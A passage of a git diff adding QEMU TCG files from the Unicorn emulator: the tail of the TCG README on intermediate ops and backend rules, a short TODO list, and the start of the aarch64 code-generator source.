blocks + +- Basic blocks end after branches (e.g. brcond_i32 instruction), + goto_tb and exit_tb instructions. +- Basic blocks start after the end of a previous basic block, or at a + set_label instruction. + +After the end of a basic block, the content of temporaries is +destroyed, but local temporaries and globals are preserved. + +* Floating point types are not supported yet + +* Pointers: depending on the TCG target, pointer size is 32 bit or 64 + bit. The type TCG_TYPE_PTR is an alias to TCG_TYPE_I32 or + TCG_TYPE_I64. + +* Helpers: + +Using the tcg_gen_helper_x_y it is possible to call any function +taking i32, i64 or pointer types. By default, before calling a helper, +all globals are stored at their canonical location and it is assumed +that the function can modify them. By default, the helper is allowed to +modify the CPU state or raise an exception. + +This can be overridden using the following function modifiers: +- TCG_CALL_NO_READ_GLOBALS means that the helper does not read globals, + either directly or via an exception. They will not be saved to their + canonical locations before calling the helper. +- TCG_CALL_NO_WRITE_GLOBALS means that the helper does not modify any globals. + They will only be saved to their canonical location before calling helpers, + but they won't be reloaded afterwise. +- TCG_CALL_NO_SIDE_EFFECTS means that the call to the function is removed if + the return value is not used. + +Note that TCG_CALL_NO_READ_GLOBALS implies TCG_CALL_NO_WRITE_GLOBALS. + +On some TCG targets (e.g. x86), several calling conventions are +supported. + +* Branches: + +Use the instruction 'br' to jump to a label. + +3.3) Code Optimizations + +When generating instructions, you can count on at least the following +optimizations: + +- Single instructions are simplified, e.g. + + and_i32 t0, t0, $0xffffffff + + is suppressed. + +- A liveness analysis is done at the basic block level. The + information is used to suppress moves from a dead variable to + another one. It is also used to remove instructions which compute + dead results. The later is especially useful for condition code + optimization in QEMU. + + In the following example: + + add_i32 t0, t1, t2 + add_i32 t0, t0, $1 + mov_i32 t0, $1 + + only the last instruction is kept. + +3.4) Instruction Reference + +********* Function call + +* call ptr + +call function 'ptr' (pointer type) + + optional 32 bit or 64 bit return value + optional 32 bit or 64 bit parameters + +********* Jumps/Labels + +* set_label $label + +Define label 'label' at the current program point. + +* br $label + +Jump to label. + +* brcond_i32/i64 t0, t1, cond, label + +Conditional jump if t0 cond t1 is true. cond can be: + TCG_COND_EQ + TCG_COND_NE + TCG_COND_LT /* signed */ + TCG_COND_GE /* signed */ + TCG_COND_LE /* signed */ + TCG_COND_GT /* signed */ + TCG_COND_LTU /* unsigned */ + TCG_COND_GEU /* unsigned */ + TCG_COND_LEU /* unsigned */ + TCG_COND_GTU /* unsigned */ + +********* Arithmetic + +* add_i32/i64 t0, t1, t2 + +t0=t1+t2 + +* sub_i32/i64 t0, t1, t2 + +t0=t1-t2 + +* neg_i32/i64 t0, t1 + +t0=-t1 (two's complement) + +* mul_i32/i64 t0, t1, t2 + +t0=t1*t2 + +* div_i32/i64 t0, t1, t2 + +t0=t1/t2 (signed). Undefined behavior if division by zero or overflow. + +* divu_i32/i64 t0, t1, t2 + +t0=t1/t2 (unsigned). Undefined behavior if division by zero. + +* rem_i32/i64 t0, t1, t2 + +t0=t1%t2 (signed). Undefined behavior if division by zero or overflow. + +* remu_i32/i64 t0, t1, t2 + +t0=t1%t2 (unsigned). Undefined behavior if division by zero. + +********* Logical + +* and_i32/i64 t0, t1, t2 + +t0=t1&t2 + +* or_i32/i64 t0, t1, t2 + +t0=t1|t2 + +* xor_i32/i64 t0, t1, t2 + +t0=t1^t2 + +* not_i32/i64 t0, t1 + +t0=~t1 + +* andc_i32/i64 t0, t1, t2 + +t0=t1&~t2 + +* eqv_i32/i64 t0, t1, t2 + +t0=~(t1^t2), or equivalently, t0=t1^~t2 + +* nand_i32/i64 t0, t1, t2 + +t0=~(t1&t2) + +* nor_i32/i64 t0, t1, t2 + +t0=~(t1|t2) + +* orc_i32/i64 t0, t1, t2 + +t0=t1|~t2 + +********* Shifts/Rotates + +* shl_i32/i64 t0, t1, t2 + +t0=t1 << t2. Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* shr_i32/i64 t0, t1, t2 + +t0=t1 >> t2 (unsigned). Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* sar_i32/i64 t0, t1, t2 + +t0=t1 >> t2 (signed). Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* rotl_i32/i64 t0, t1, t2 + +Rotation of t2 bits to the left. +Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +* rotr_i32/i64 t0, t1, t2 + +Rotation of t2 bits to the right. +Unspecified behavior if t2 < 0 or t2 >= 32 (resp 64) + +********* Misc + +* mov_i32/i64 t0, t1 + +t0 = t1 + +Move t1 to t0 (both operands must have the same type). + +* ext8s_i32/i64 t0, t1 +ext8u_i32/i64 t0, t1 +ext16s_i32/i64 t0, t1 +ext16u_i32/i64 t0, t1 +ext32s_i64 t0, t1 +ext32u_i64 t0, t1 + +8, 16 or 32 bit sign/zero extension (both operands must have the same type) + +* bswap16_i32/i64 t0, t1 + +16 bit byte swap on a 32/64 bit value. It assumes that the two/six high order +bytes are set to zero. + +* bswap32_i32/i64 t0, t1 + +32 bit byte swap on a 32/64 bit value. With a 64 bit value, it assumes that +the four high order bytes are set to zero. + +* bswap64_i64 t0, t1 + +64 bit byte swap + +* discard_i32/i64 t0 + +Indicate that the value of t0 won't be used later. It is useful to +force dead code elimination. + +* deposit_i32/i64 dest, t1, t2, pos, len + +Deposit T2 as a bitfield into T1, placing the result in DEST. +The bitfield is described by POS/LEN, which are immediate values: + + LEN - the length of the bitfield + POS - the position of the first bit, counting from the LSB + +For example, pos=8, len=4 indicates a 4-bit field at bit 8. +This operation would be equivalent to + + dest = (t1 & ~0x0f00) | ((t2 << 8) & 0x0f00) + +* trunc_shr_i32 t0, t1, pos + +For 64-bit hosts only, right shift the 64-bit input T1 by POS and +truncate to 32-bit output T0. Depending on the host, this may be +a simple mov/shift, or may require additional canonicalization. + +********* Conditional moves + +* setcond_i32/i64 dest, t1, t2, cond + +dest = (t1 cond t2) + +Set DEST to 1 if (T1 cond T2) is true, otherwise set to 0. + +* movcond_i32/i64 dest, c1, c2, v1, v2, cond + +dest = (c1 cond c2 ? v1 : v2) + +Set DEST to V1 if (C1 cond C2) is true, otherwise set to V2. + +********* Type conversions + +* ext_i32_i64 t0, t1 +Convert t1 (32 bit) to t0 (64 bit) and does sign extension + +* extu_i32_i64 t0, t1 +Convert t1 (32 bit) to t0 (64 bit) and does zero extension + +* trunc_i64_i32 t0, t1 +Truncate t1 (64 bit) to t0 (32 bit) + +* concat_i32_i64 t0, t1, t2 +Construct t0 (64-bit) taking the low half from t1 (32 bit) and the high half +from t2 (32 bit). + +* concat32_i64 t0, t1, t2 +Construct t0 (64-bit) taking the low half from t1 (64 bit) and the high half +from t2 (64 bit). + +********* Load/Store + +* ld_i32/i64 t0, t1, offset +ld8s_i32/i64 t0, t1, offset +ld8u_i32/i64 t0, t1, offset +ld16s_i32/i64 t0, t1, offset +ld16u_i32/i64 t0, t1, offset +ld32s_i64 t0, t1, offset +ld32u_i64 t0, t1, offset + +t0 = read(t1 + offset) +Load 8, 16, 32 or 64 bits with or without sign extension from host memory. +offset must be a constant. + +* st_i32/i64 t0, t1, offset +st8_i32/i64 t0, t1, offset +st16_i32/i64 t0, t1, offset +st32_i64 t0, t1, offset + +write(t0, t1 + offset) +Write 8, 16, 32 or 64 bits to host memory. + +All this opcodes assume that the pointed host memory doesn't correspond +to a global. In the latter case the behaviour is unpredictable. + +********* Multiword arithmetic support + +* add2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high +* sub2_i32/i64 t0_low, t0_high, t1_low, t1_high, t2_low, t2_high + +Similar to add/sub, except that the double-word inputs T1 and T2 are +formed from two single-word arguments, and the double-word output T0 +is returned in two single-word outputs. + +* mulu2_i32/i64 t0_low, t0_high, t1, t2 + +Similar to mul, except two unsigned inputs T1 and T2 yielding the full +double-word product T0. The later is returned in two single-word outputs. + +* muls2_i32/i64 t0_low, t0_high, t1, t2 + +Similar to mulu2, except the two inputs T1 and T2 are signed. + +********* 64-bit guest on 32-bit host support + +The following opcodes are internal to TCG. Thus they are to be implemented by +32-bit host code generators, but are not to be emitted by guest translators. +They are emitted as needed by inline functions within "tcg-op.h". + +* brcond2_i32 t0_low, t0_high, t1_low, t1_high, cond, label + +Similar to brcond, except that the 64-bit values T0 and T1 +are formed from two 32-bit arguments. + +* setcond2_i32 dest, t1_low, t1_high, t2_low, t2_high, cond + +Similar to setcond, except that the 64-bit values T1 and T2 are +formed from two 32-bit arguments. The result is a 32-bit value. + +********* QEMU specific operations + +* exit_tb t0 + +Exit the current TB and return the value t0 (word type). + +* goto_tb index + +Exit the current TB and jump to the TB index 'index' (constant) if the +current TB was linked to this TB. Otherwise execute the next +instructions. Only indices 0 and 1 are valid and tcg_gen_goto_tb may be issued +at most once with each slot index per TB. + +* qemu_ld_i32/i64 t0, t1, flags, memidx +* qemu_st_i32/i64 t0, t1, flags, memidx + +Load data at the guest address t1 into t0, or store data in t0 at guest +address t1. The _i32/_i64 size applies to the size of the input/output +register t0 only. The address t1 is always sized according to the guest, +and the width of the memory operation is controlled by flags. + +Both t0 and t1 may be split into little-endian ordered pairs of registers +if dealing with 64-bit quantities on a 32-bit host. + +The memidx selects the qemu tlb index to use (e.g. user or kernel access). +The flags are the TCGMemOp bits, selecting the sign, width, and endianness +of the memory access. + +For a 32-bit host, qemu_ld/st_i64 is guaranteed to only be used with a +64-bit memory access specified in flags. + +********* + +Note 1: Some shortcuts are defined when the last operand is known to be +a constant (e.g. addi for add, movi for mov). + +Note 2: When using TCG, the opcodes must never be generated directly +as some of them may not be available as "real" opcodes. Always use the +function tcg_gen_xxx(args). + +4) Backend + +tcg-target.h contains the target specific definitions. tcg-target.c +contains the target specific code. + +4.1) Assumptions + +The target word size (TCG_TARGET_REG_BITS) is expected to be 32 bit or +64 bit. It is expected that the pointer has the same size as the word. + +On a 32 bit target, all 64 bit operations are converted to 32 bits. A +few specific operations must be implemented to allow it (see add2_i32, +sub2_i32, brcond2_i32). + +Floating point operations are not supported in this version. A +previous incarnation of the code generator had full support of them, +but it is better to concentrate on integer operations first. + +On a 64 bit target, no assumption is made in TCG about the storage of +the 32 bit values in 64 bit registers. + +4.2) Constraints + +GCC like constraints are used to define the constraints of every +instruction. Memory constraints are not supported in this +version. Aliases are specified in the input operands as for GCC. + +The same register may be used for both an input and an output, even when +they are not explicitly aliased. If an op expands to multiple target +instructions then care must be taken to avoid clobbering input values. +GCC style "early clobber" outputs are not currently supported. + +A target can define specific register or constant constraints. If an +operation uses a constant input constraint which does not allow all +constants, it must also accept registers in order to have a fallback. + +The movi_i32 and movi_i64 operations must accept any constants. + +The mov_i32 and mov_i64 operations must accept any registers of the +same type. + +The ld/st instructions must accept signed 32 bit constant offsets. It +can be implemented by reserving a specific register to compute the +address if the offset is too big. + +The ld/st instructions must accept any destination (ld) or source (st) +register. + +4.3) Function call assumptions + +- The only supported types for parameters and return value are: 32 and + 64 bit integers and pointer. +- The stack grows downwards. +- The first N parameters are passed in registers. +- The next parameters are passed on the stack by storing them as words. +- Some registers are clobbered during the call. +- The function can return 0 or 1 value in registers. On a 32 bit + target, functions must be able to return 2 values in registers for + 64 bit return type. + +5) Recommended coding rules for best performance + +- Use globals to represent the parts of the QEMU CPU state which are + often modified, e.g. the integer registers and the condition + codes. TCG will be able to use host registers to store them. + +- Avoid globals stored in fixed registers. They must be used only to + store the pointer to the CPU state and possibly to store a pointer + to a register window. + +- Use temporaries. Use local temporaries only when really needed, + e.g. when you need to use a value after a jump. Local temporaries + introduce a performance hit in the current TCG implementation: their + content is saved to memory at end of each basic block. + +- Free temporaries and local temporaries when they are no longer used + (tcg_temp_free). Since tcg_const_x() also creates a temporary, you + should free it after it is used. Freeing temporaries does not yield + a better generated code, but it reduces the memory usage of TCG and + the speed of the translation. + +- Don't hesitate to use helpers for complicated or seldom used guest + instructions. There is little performance advantage in using TCG to + implement guest instructions taking more than about twenty TCG + instructions. Note that this rule of thumb is more applicable to + helpers doing complex logic or arithmetic, where the C compiler has + scope to do a good job of optimisation; it is less relevant where + the instruction is mostly doing loads and stores, and in those cases + inline TCG may still be faster for longer sequences. + +- The hard limit on the number of TCG instructions you can generate + per guest instruction is set by MAX_OP_PER_INSTR in exec-all.h -- + you cannot exceed this without risking a buffer overrun. + +- Use the 'discard' instruction if you know that TCG won't be able to + prove that a given global is "dead" at a given program point. The + x86 guest uses it to improve the condition codes optimisation. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/TODO new file mode 100644 index 0000000..0747847 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/TODO @@ -0,0 +1,14 @@ +- Add new instructions such as: clz, ctz, popcnt. + +- See if it is worth exporting mul2, mulu2, div2, divu2. + +- Support of globals saved in fixed registers between TBs. + +Ideas: + +- Move the slow part of the qemu_ld/st ops after the end of the TB. + +- Change exception syntax to get closer to QOP system (exception + parameters given with a specific instruction). + +- Add float and vector support. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.c new file mode 100644 index 0000000..ce8360f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/aarch64/tcg-target.c @@ -0,0 +1,1814 @@ +/* + * Initial TCG Implementation for aarch64 + * + * Copyright (c) 2013 Huawei Technologies Duesseldorf GmbH + * Written by Claudio Fontana + * + * This work is licensed under the terms of the GNU GPL, version 2 or + * (at your option) any later version. + * + * See the COPYING file in the top-level directory for details. + */ + +#include "tcg-be-ldst.h" +#include "qemu/bitops.h" + +/* We're going to re-use TCGType in setting of the SF bit, which controls + the size of the operation performed. If we know the values match, it + makes things much cleaner. */ +QEMU_BUILD_BUG_ON(TCG_TYPE_I32 != 0 || TCG_TYPE_I64 != 1); + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "%x0", "%x1", "%x2", "%x3", "%x4", "%x5", "%x6", "%x7", + "%x8", "%x9", "%x10", "%x11", "%x12", "%x13", "%x14", "%x15", + "%x16", "%x17", "%x18", "%x19", "%x20", "%x21", "%x22", "%x23", + "%x24", "%x25", "%x26", "%x27", "%x28", "%fp", "%x30", "%sp", +}; +#endif /* NDEBUG */ + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_X20, TCG_REG_X21, TCG_REG_X22, TCG_REG_X23, + TCG_REG_X24, TCG_REG_X25, TCG_REG_X26, TCG_REG_X27, + TCG_REG_X28, /* we will reserve this for GUEST_BASE if configured */ + + TCG_REG_X8, TCG_REG_X9, TCG_REG_X10, TCG_REG_X11, + TCG_REG_X12, TCG_REG_X13, TCG_REG_X14, TCG_REG_X15, + TCG_REG_X16, TCG_REG_X17, + + TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, + TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7, + + /* X18 reserved by system */ + /* X19 reserved for AREG0 */ + /* X29 reserved as fp */ + /* X30 reserved as temporary */ +}; + +static const int tcg_target_call_iarg_regs[8] = { + TCG_REG_X0, TCG_REG_X1, TCG_REG_X2, TCG_REG_X3, + TCG_REG_X4, TCG_REG_X5, TCG_REG_X6, TCG_REG_X7 +}; +static const int tcg_target_call_oarg_regs[1] = { + TCG_REG_X0 +}; + +#define TCG_REG_TMP TCG_REG_X30 + +#ifndef CONFIG_SOFTMMU +# ifdef CONFIG_USE_GUEST_BASE +# define TCG_REG_GUEST_BASE TCG_REG_X28 +# else +# define TCG_REG_GUEST_BASE TCG_REG_XZR +# endif +#endif + +static inline void reloc_pc26(tcg_insn_unit *code_ptr, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - code_ptr; + assert(offset == sextract64(offset, 0, 26)); + /* read instruction, mask away previous PC_REL26 parameter contents, + set the proper offset, then write back the instruction. */ + *code_ptr = deposit32(*code_ptr, 0, 26, offset); +} + +static inline void reloc_pc19(tcg_insn_unit *code_ptr, tcg_insn_unit *target) +{ + ptrdiff_t offset = target - code_ptr; + assert(offset == sextract64(offset, 0, 19)); + *code_ptr = deposit32(*code_ptr, 5, 19, offset); +} + +static inline void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + assert(addend == 0); + switch (type) { + case R_AARCH64_JUMP26: + case R_AARCH64_CALL26: + reloc_pc26(code_ptr, (tcg_insn_unit *)value); + break; + case R_AARCH64_CONDBR19: + reloc_pc19(code_ptr, (tcg_insn_unit *)value); + break; + default: + tcg_abort(); + } +} + +#define TCG_CT_CONST_AIMM 0x100 +#define TCG_CT_CONST_LIMM 0x200 +#define TCG_CT_CONST_ZERO 0x400 +#define TCG_CT_CONST_MONE 0x800 + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, + const char **pct_str) +{ + const char *ct_str = *pct_str; + + switch (ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, (1ULL << TCG_TARGET_NB_REGS) - 1); + break; + case 'l': /* qemu_ld / qemu_st address, data_reg */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, (1ULL << TCG_TARGET_NB_REGS) - 1); +#ifdef CONFIG_SOFTMMU + /* x0 and x1 will be overwritten when reading the tlb entry, + and x2, and x3 for helper args, better to avoid using them. */ + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X0); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X1); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X2); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_X3); +#endif + break; + case 'A': /* Valid for arithmetic immediate (positive or negative). */ + ct->ct |= TCG_CT_CONST_AIMM; + break; + case 'L': /* Valid for logical immediate. */ + ct->ct |= TCG_CT_CONST_LIMM; + break; + case 'M': /* minus one */ + ct->ct |= TCG_CT_CONST_MONE; + break; + case 'Z': /* zero */ + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + + ct_str++; + *pct_str = ct_str; + return 0; +} + +static inline bool is_aimm(uint64_t val) +{ + return (val & ~0xfff) == 0 || (val & ~0xfff000) == 0; +} + +static inline bool is_limm(uint64_t val) +{ + /* Taking a simplified view of the logical immediates for now, ignoring + the replication that can happen across the field. Match bit patterns + of the forms + 0....01....1 + 0..01..10..0 + and their inverses. */ + + /* Make things easier below, by testing the form with msb clear. */ + if ((int64_t)val < 0) { + val = ~val; + } + if (val == 0) { + return false; + } + val += val & -val; + return (val & (val - 1)) == 0; +} + +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + + if (ct & TCG_CT_CONST) { + return 1; + } + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + if ((ct & TCG_CT_CONST_AIMM) && (is_aimm(val) || is_aimm(-val))) { + return 1; + } + if ((ct & TCG_CT_CONST_LIMM) && is_limm(val)) { + return 1; + } + if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } + if ((ct & TCG_CT_CONST_MONE) && val == -1) { + return 1; + } + + return 0; +} + +enum aarch64_cond_code { + COND_EQ = 0x0, + COND_NE = 0x1, + COND_CS = 0x2, /* Unsigned greater or equal */ + COND_HS = COND_CS, /* ALIAS greater or equal */ + COND_CC = 0x3, /* Unsigned less than */ + COND_LO = COND_CC, /* ALIAS Lower */ + COND_MI = 0x4, /* Negative */ + COND_PL = 0x5, /* Zero or greater */ + COND_VS = 0x6, /* Overflow */ + COND_VC = 0x7, /* No overflow */ + COND_HI = 0x8, /* Unsigned greater than */ + COND_LS = 0x9, /* Unsigned less or equal */ + COND_GE = 0xa, + COND_LT = 0xb, + COND_GT = 0xc, + COND_LE = 0xd, + COND_AL = 0xe, + COND_NV = 0xf, /* behaves like COND_AL here */ +}; + +static const enum aarch64_cond_code tcg_cond_to_aarch64[] = { + [TCG_COND_EQ] = COND_EQ, + [TCG_COND_NE] = COND_NE, + [TCG_COND_LT] = COND_LT, + [TCG_COND_GE] = COND_GE, + [TCG_COND_LE] = COND_LE, + [TCG_COND_GT] = COND_GT, + /* unsigned */ + [TCG_COND_LTU] = COND_LO, + [TCG_COND_GTU] = COND_HI, + [TCG_COND_GEU] = COND_HS, + [TCG_COND_LEU] = COND_LS, +}; + +typedef enum { + LDST_ST = 0, /* store */ + LDST_LD = 1, /* load */ + LDST_LD_S_X = 2, /* load and sign-extend into Xt */ + LDST_LD_S_W = 3, /* load and sign-extend into Wt */ +} AArch64LdstType; + +/* We encode the format of the insn into the beginning of the name, so that + we can have the preprocessor help "typecheck" the insn vs the output + function. Arm didn't provide us with nice names for the formats, so we + use the section number of the architecture reference manual in which the + instruction group is described. */ +typedef enum { + /* Compare and branch (immediate). */ + I3201_CBZ = 0x34000000, + I3201_CBNZ = 0x35000000, + + /* Conditional branch (immediate). */ + I3202_B_C = 0x54000000, + + /* Unconditional branch (immediate). */ + I3206_B = 0x14000000, + I3206_BL = 0x94000000, + + /* Unconditional branch (register). */ + I3207_BR = 0xd61f0000, + I3207_BLR = 0xd63f0000, + I3207_RET = 0xd65f0000, + + /* Load/store register. Described here as 3.3.12, but the helper + that emits them can transform to 3.3.10 or 3.3.13. */ + I3312_STRB = 0x38000000 | LDST_ST << 22 | MO_8 << 30, + I3312_STRH = 0x38000000 | LDST_ST << 22 | MO_16 << 30, + I3312_STRW = 0x38000000 | LDST_ST << 22 | MO_32 << 30, + I3312_STRX = 0x38000000 | LDST_ST << 22 | MO_64 << 30, + + I3312_LDRB = 0x38000000 | LDST_LD << 22 | MO_8 << 30, + I3312_LDRH = 0x38000000 | LDST_LD << 22 | MO_16 << 30, + I3312_LDRW = 0x38000000 | LDST_LD << 22 | MO_32 << 30, + I3312_LDRX = 0x38000000 | LDST_LD << 22 | MO_64 << 30, + + I3312_LDRSBW = 0x38000000 | LDST_LD_S_W << 22 | MO_8 << 30, + I3312_LDRSHW = 0x38000000 | LDST_LD_S_W << 22 | MO_16 << 30, + + I3312_LDRSBX = 0x38000000 | LDST_LD_S_X << 22 | MO_8 << 30, + I3312_LDRSHX = 0x38000000 | LDST_LD_S_X << 22 | MO_16 << 30, + I3312_LDRSWX = 0x38000000 | LDST_LD_S_X << 22 | MO_32 << 30, + + I3312_TO_I3310 = 0x00206800, + I3312_TO_I3313 = 0x01000000, + + /* Load/store register pair instructions. */ + I3314_LDP = 0x28400000, + I3314_STP = 0x28000000, + + /* Add/subtract immediate instructions. */ + I3401_ADDI = 0x11000000, + I3401_ADDSI = 0x31000000, + I3401_SUBI = 0x51000000, + I3401_SUBSI = 0x71000000, + + /* Bitfield instructions. */ + I3402_BFM = 0x33000000, + I3402_SBFM = 0x13000000, + I3402_UBFM = 0x53000000, + + /* Extract instruction. */ + I3403_EXTR = 0x13800000, + + /* Logical immediate instructions. */ + I3404_ANDI = 0x12000000, + I3404_ORRI = 0x32000000, + I3404_EORI = 0x52000000, + + /* Move wide immediate instructions. */ + I3405_MOVN = 0x12800000, + I3405_MOVZ = 0x52800000, + I3405_MOVK = 0x72800000, + + /* PC relative addressing instructions. */ + I3406_ADR = 0x10000000, + I3406_ADRP = 0x90000000, + + /* Add/subtract shifted register instructions (without a shift). */ + I3502_ADD = 0x0b000000, + I3502_ADDS = 0x2b000000, + I3502_SUB = 0x4b000000, + I3502_SUBS = 0x6b000000, + + /* Add/subtract shifted register instructions (with a shift). */ + I3502S_ADD_LSL = I3502_ADD, + + /* Add/subtract with carry instructions. */ + I3503_ADC = 0x1a000000, + I3503_SBC = 0x5a000000, + + /* Conditional select instructions. */ + I3506_CSEL = 0x1a800000, + I3506_CSINC = 0x1a800400, + + /* Data-processing (1 source) instructions. */ + I3507_REV16 = 0x5ac00400, + I3507_REV32 = 0x5ac00800, + I3507_REV64 = 0x5ac00c00, + + /* Data-processing (2 source) instructions. */ + I3508_LSLV = 0x1ac02000, + I3508_LSRV = 0x1ac02400, + I3508_ASRV = 0x1ac02800, + I3508_RORV = 0x1ac02c00, + I3508_SMULH = 0x9b407c00, + I3508_UMULH = 0x9bc07c00, + I3508_UDIV = 0x1ac00800, + I3508_SDIV = 0x1ac00c00, + + /* Data-processing (3 source) instructions. */ + I3509_MADD = 0x1b000000, + I3509_MSUB = 0x1b008000, + + /* Logical shifted register instructions (without a shift). */ + I3510_AND = 0x0a000000, + I3510_BIC = 0x0a200000, + I3510_ORR = 0x2a000000, + I3510_ORN = 0x2a200000, + I3510_EOR = 0x4a000000, + I3510_EON = 0x4a200000, + I3510_ANDS = 0x6a000000, +} AArch64Insn; + +static inline uint32_t tcg_in32(TCGContext *s) +{ + uint32_t v = *(uint32_t *)s->code_ptr; + return v; +} + +/* Emit an opcode with "type-checking" of the format. */ +#define tcg_out_insn(S, FMT, OP, ...) \ + glue(tcg_out_insn_,FMT)(S, glue(glue(glue(I,FMT),_),OP), ## __VA_ARGS__) + +static void tcg_out_insn_3201(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rt, int imm19) +{ + tcg_out32(s, insn | ext << 31 | (imm19 & 0x7ffff) << 5 | rt); +} + +static void tcg_out_insn_3202(TCGContext *s, AArch64Insn insn, + TCGCond c, int imm19) +{ + tcg_out32(s, insn | tcg_cond_to_aarch64[c] | (imm19 & 0x7ffff) << 5); +} + +static void tcg_out_insn_3206(TCGContext *s, AArch64Insn insn, int imm26) +{ + tcg_out32(s, insn | (imm26 & 0x03ffffff)); +} + +static void tcg_out_insn_3207(TCGContext *s, AArch64Insn insn, TCGReg rn) +{ + tcg_out32(s, insn | rn << 5); +} + +static void tcg_out_insn_3314(TCGContext *s, AArch64Insn insn, + TCGReg r1, TCGReg r2, TCGReg rn, + tcg_target_long ofs, bool pre, bool w) +{ + insn |= 1u << 31; /* ext */ + insn |= pre << 24; + insn |= w << 23; + + assert(ofs >= -0x200 && ofs < 0x200 && (ofs & 7) == 0); + insn |= (ofs & (0x7f << 3)) << (15 - 3); + + tcg_out32(s, insn | r2 << 10 | rn << 5 | r1); +} + +static void tcg_out_insn_3401(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, uint64_t aimm) +{ + if (aimm > 0xfff) { + assert((aimm & 0xfff) == 0); + aimm >>= 12; + assert(aimm <= 0xfff); + aimm |= 1 << 12; /* apply LSL 12 */ + } + tcg_out32(s, insn | ext << 31 | aimm << 10 | rn << 5 | rd); +} + +/* This function can be used for both 3.4.2 (Bitfield) and 3.4.4 + (Logical immediate). Both insn groups have N, IMMR and IMMS fields + that feed the DecodeBitMasks pseudo function. */ +static void tcg_out_insn_3402(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, int n, int immr, int imms) +{ + tcg_out32(s, insn | ext << 31 | n << 22 | immr << 16 | imms << 10 + | rn << 5 | rd); +} + +#define tcg_out_insn_3404 tcg_out_insn_3402 + +static void tcg_out_insn_3403(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm, int imms) +{ + tcg_out32(s, insn | ext << 31 | ext << 22 | rm << 16 | imms << 10 + | rn << 5 | rd); +} + +/* This function is used for the Move (wide immediate) instruction group. + Note that SHIFT is a full shift count, not the 2 bit HW field. */ +static void tcg_out_insn_3405(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, uint16_t half, unsigned shift) +{ + assert((shift & ~0x30) == 0); + tcg_out32(s, insn | ext << 31 | shift << (21 - 4) | half << 5 | rd); +} + +static void tcg_out_insn_3406(TCGContext *s, AArch64Insn insn, + TCGReg rd, int64_t disp) +{ + tcg_out32(s, insn | (disp & 3) << 29 | (disp & 0x1ffffc) << (5 - 2) | rd); +} + +/* This function is for both 3.5.2 (Add/Subtract shifted register), for + the rare occasion when we actually want to supply a shift amount. */ +static inline void tcg_out_insn_3502S(TCGContext *s, AArch64Insn insn, + TCGType ext, TCGReg rd, TCGReg rn, + TCGReg rm, int imm6) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | imm6 << 10 | rn << 5 | rd); +} + +/* This function is for 3.5.2 (Add/subtract shifted register), + and 3.5.10 (Logical shifted register), for the vast majorty of cases + when we don't want to apply a shift. Thus it can also be used for + 3.5.3 (Add/subtract with carry) and 3.5.8 (Data processing 2 source). */ +static void tcg_out_insn_3502(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd); +} + +#define tcg_out_insn_3503 tcg_out_insn_3502 +#define tcg_out_insn_3508 tcg_out_insn_3502 +#define tcg_out_insn_3510 tcg_out_insn_3502 + +static void tcg_out_insn_3506(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm, TCGCond c) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | rn << 5 | rd + | tcg_cond_to_aarch64[c] << 12); +} + +static void tcg_out_insn_3507(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn) +{ + tcg_out32(s, insn | ext << 31 | rn << 5 | rd); +} + +static void tcg_out_insn_3509(TCGContext *s, AArch64Insn insn, TCGType ext, + TCGReg rd, TCGReg rn, TCGReg rm, TCGReg ra) +{ + tcg_out32(s, insn | ext << 31 | rm << 16 | ra << 10 | rn << 5 | rd); +} + +static void tcg_out_insn_3310(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg base, TCGReg regoff) +{ + /* Note the AArch64Insn constants above are for C3.3.12. Adjust. */ + tcg_out32(s, insn | I3312_TO_I3310 | regoff << 16 | base << 5 | rd); +} + + +static void tcg_out_insn_3312(TCGContext *s, AArch64Insn insn, + TCGReg rd, TCGReg rn, intptr_t offset) +{ + tcg_out32(s, insn | (offset & 